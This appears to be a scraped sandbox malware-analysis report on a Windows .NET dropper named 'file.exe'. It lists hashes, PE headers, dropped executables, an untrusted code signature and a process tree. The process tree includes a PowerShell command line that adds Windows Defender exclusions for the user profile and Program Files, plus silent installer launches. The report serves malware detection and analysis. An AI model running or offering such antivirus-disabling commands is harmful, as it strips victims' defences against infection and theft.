SHA-256:	B1A7EC17BF00D0D8D15ADEB1F9D9DE29404841B9F6C1DF3F356F5255BAF18FFB
SHA-512:	F4FB7D8C5033BF49F844395180DD52012FDFD67DEEA344BD46D7D99E9EA9552994B7DAEF5CDF83530A91D6CAC53EBC06A25F945BEAA7172BF3AF5F0E02148A61
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v.......v.......v.....9.v.[.....v...w...v.3s....v.3s....v.3s....v.Rich..v.........PE..L......_......................b..............0....@...........................o.....I.o...@...........................n......%n.......n......................pn.tt..................................(.l.@............ n..............................text...W........................... ..`.info........ ...................... ....data.....a..0....a.................@....idata...#... n..$....m.............@..@.info........Pn.......n.............@....reloc..tt...pn..v...<n.............@..B.rsrc.........n.......n.............@..@........................................................................................................................................................................................................................................................

Process:	C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6398488
Entropy (8bit):	7.995784783842997
Encrypted:	true
SSDEEP:	98304:91OZoLr5hWGs2O71dkYKJO5+XDaqGf1r1tCzKgvm2cAJg105cEGDzm91U:91OiL6P2qjKjXDK/ozvtfem5Cmg
MD5:	2CAFB9685610BFF31960C959887426AA
SHA1:	A980A387635E7820DD2AF9CF2BB94E190B7545D6
SHA-256:	4A5CE0CC849CE8AEB1E6580E610FF413AAC0A596ACB29C05BC81755C0E926A8C
SHA-512:	A4538A230A88D47DFA4AD06C4AE0686A7D5BE7177D324CEBC9759BA02BFF90EDDE410EC4F6BD4A6FDBC7A5A962BB415EEB0F92A2B412ABC8485BD2B2F4712635
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7257600
Entropy (8bit):	7.440219364896932
Encrypted:	false
SSDEEP:	196608:CNsJA0QbUplMXk/td4xhpNsiV+CDpkpE7Cu:CNvgWQd4PpNnlGI
MD5:	24A387FDA6E0F36F9AF44D65487C5F5B
SHA1:	A2E4DDFCE98B2936DA2D1BC0D9F51F49D4C3C970
SHA-256:	B1A7EC17BF00D0D8D15ADEB1F9D9DE29404841B9F6C1DF3F356F5255BAF18FFB
SHA-512:	F4FB7D8C5033BF49F844395180DD52012FDFD67DEEA344BD46D7D99E9EA9552994B7DAEF5CDF83530A91D6CAC53EBC06A25F945BEAA7172BF3AF5F0E02148A61
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v.......v.......v.....9.v.[.....v...w...v.3s....v.3s....v.3s....v.Rich..v.........PE..L......_......................b..............0....@...........................o.....I.o...@...........................n......%n.......n......................pn.tt..................................(.l.@............ n..............................text...W........................... ..`.info........ ...................... ....data.....a..0....a.................@....idata...#... n..$....m.............@..@.info........Pn.......n.............@....reloc..tt...pn..v...<n.............@..B.rsrc.........n.......n.............@..@........................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4805536
Entropy (8bit):	6.875913852962176
Encrypted:	false
SSDEEP:	98304:Q6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwr:/WFzeft2SyBg7VqV7/l6iFCfjm+HUWXo
MD5:	161C755621AA80426D48315D27BC8DAA
SHA1:	C17FED1E315395B38474842D3353663066B250C5
SHA-256:	6A17694A9428CB7EBCF1B7803E236AB76A557D4C041A5F7F229D6BAB87B2C89B
SHA-512:	5DBA00756F973ECDDD0994C4AF9779F26AEC7F8F2B4F890532FBA3CBB0A1E37FBC791BF8FBCA047C4F3DBAA984AE78E2D4623686B83E6387741DB959D36C22BF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;qVe.........."!......2..V.......!&.......................................J.......I...@A.........................~:.m...[.:.......<..=...........I..)...0I....\B:......................A:.......2...............:.0....}:.`....................text...(.2.......2................. ..`.rdata........2.......2.............@..@.data...x.....:..L....:.............@....00cfg........<......;.............@..@.rodata.X.....<......,;............. ..`.tls....Y.....<.......;.............@...CPADinfo0.....<......0;.............@...malloc_h......<......2;............. ..`.rsrc....=....<..>...4;.............@..@.reloc......0I......rG.............@..B........................................................................................................................................................................................................................................

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.200379140545521
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'153'896 bytes
MD5:	db05c4ddd1c651561ce6b89e99a332f6
SHA1:	e92017c7673b82ef1c64c60a19e09307b902e73a
SHA256:	217265f9279820005c1037dd06668169a841230842ddd53961122066d9fb6786
SHA512:	37a3f2e15284489e3c8128a87f5164fbda9ca4f3a369b4ba8fa9f1f449146bfc36e631d766918d0ae6ab6cb31bc517c05bf1b348c980aae7ebd54f945991b8c6
SSDEEP:	24576:9W9bn2dEUp6TJAJJBq4hPCeQcby8MT+uzNS356vsVQxVH20GKYat7PKUboqGTh7l:9W1vJWBq4Amxuz03YvCQxZKK/50qGTh5
TLSH:	CD35E08131D37752E4BBA37712C6EA9CC001F0E615D6AE870EE164C4151DDCAB9B3EAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0..y............... ........@.. ..............................l.....`................................

Entrypoint:	0x519982
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD08B56F9 [Thu Nov 14 06:51:37 2080 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Signature Valid:	false
Signature Issuer:	C=CN, CN="ninja Inc "
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	21/11/2023 01:11:16 21/11/2024 01:11:16
Subject Chain	C=CN, CN="ninja Inc "
Version:	3
Thumbprint MD5:	770DC61D907CD5A0AAC99BA10888315D
Thumbprint SHA-1:	6EBEA030ACDFC1DAC3AA42EE416D6773B707215E
Thumbprint SHA-256:	0AF8AB2F40C8409847C3BD146DBF16BC3D6C983BFB6E12CE22116D257BD9CDAA
Serial:	00BE57427CC67FDE56C5F3B81E76E72B79

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1198a4	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11a000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x118400	0x1768
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1198ee	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Unpacked PEs

Sigma Signatures

Data Obfuscation

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\ProgramData\BAAEHDBF

C:\ProgramData\BAKEBFBAKKFCBGDHDGHDBAFIIE

C:\ProgramData\BKJJJDHDGDAAKECAKJDA

C:\ProgramData\BKKJKFBKKECFHJKEBKEHIDAEBK

C:\ProgramData\CFIECBFI

C:\ProgramData\IDBAKKEC

C:\ProgramData\KKFCAAKF

C:\ProgramData\KKKEBKJJDGHCBGCAAKEH

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

C:\Users\user\AppData\Local\Temp\7zS2AC3.tmp\data\config.txt

C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\data\config.txt

C:\Users\user\AppData\Local\Temp\7zSD77.tmp\data\config.txt

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x117988	0x117a00	False	0.7230552567612875	data	7.195511453858471	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x11a000	0x586	0x600	False	0.4134114583333333	data	4.030406820876349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11c000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x11a0a0	0x2fc	data			0.43717277486910994
RT_MANIFEST	0x11a39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Target ID:	0
Start time:	15:12:25
Start date:	21/11/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x750000
File size:	1'153'896 bytes
MD5 hash:	DB05C4DDD1C651561CE6B89E99A332F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	15:12:29
Start date:	21/11/2023
Path:	C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe"
Imagebase:	0x400000
File size:	263'168 bytes
MD5 hash:	1C4BA9EB815AD39858DEF7341D3CFFF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	10
Start time:	15:12:31
Start date:	21/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	false

Target ID:	16
Start time:	15:12:32
Start date:	21/11/2023
Path:	C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe"
Imagebase:	0x400000
File size:	7'643'669 bytes
MD5 hash:	5CCF030395F0F69B0C11A11E26B31833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	17
Start time:	15:12:33
Start date:	21/11/2023
Path:	C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'398'488 bytes
MD5 hash:	2CAFB9685610BFF31960C959887426AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	18
Start time:	15:12:34
Start date:	21/11/2023
Path:	C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=ZDUxMWEyYzQyYmU3YjNmMDI3NzRlNWM2YTg1YzY1MzdlNGQ4ZGExMzhjNzg4MGQyMThiMzI4OGVlZWIyNTVmNDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDU3NTk0OS4yNzIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5ZjZlMmVjMS0wNzBjLTRmYWEtODc4OS01ZWEyMjQ2NDhkMTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Imagebase:	0x8f0000
File size:	2'939'768 bytes
MD5 hash:	AC33A958FADA5BCB892E03D1FF810D8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	19
Start time:	15:12:35
Start date:	21/11/2023
Path:	C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Imagebase:	0x8f0000
File size:	2'939'768 bytes
MD5 hash:	AC33A958FADA5BCB892E03D1FF810D8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	20
Start time:	15:12:36
Start date:	21/11/2023
Path:	C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe /eeGFndidj "385121" /S
Imagebase:	0x2c0000
File size:	7'257'600 bytes
MD5 hash:	24A387FDA6E0F36F9AF44D65487C5F5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false